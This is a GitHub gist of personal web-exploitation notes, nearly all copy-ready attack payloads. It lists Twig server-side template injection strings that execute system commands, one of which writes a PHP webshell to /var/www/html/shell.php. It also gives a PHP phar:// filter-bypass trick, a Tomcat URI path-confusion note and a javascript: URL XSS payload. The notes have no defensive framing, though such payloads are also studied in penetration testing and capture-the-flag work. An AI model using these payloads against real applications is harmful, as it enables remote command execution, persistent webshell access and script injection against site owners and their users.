Last active
May 1, 2020 00:50
-
-
Save kaiili/7727c8e2d04a9d26bf883219bc9e98a6 to your computer and use it in GitHub Desktop.
记录一下我遇见的各种 trick
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PHP: | |
| readfile("phar:///1.png/test.txt") == readfile("phaR:///1.png/test.txt") | |
| TWIG SSTI: | |
| {{["id"]|map("system")|join(",") | |
| {{["id", 0]|sort("system")|join(",")}} | |
| {{["id"]|filter("system")|join(",")}} | |
| {{[0, 0]|reduce("system", "id")|join(",")}} | |
| {{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}} | |
| Python: | |
| java: | |
| tomcat: | |
| getRequestURI != getServletPath | |
| XSS: | |
| click: ```javascript:\nalert(1) | |
| ``` | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment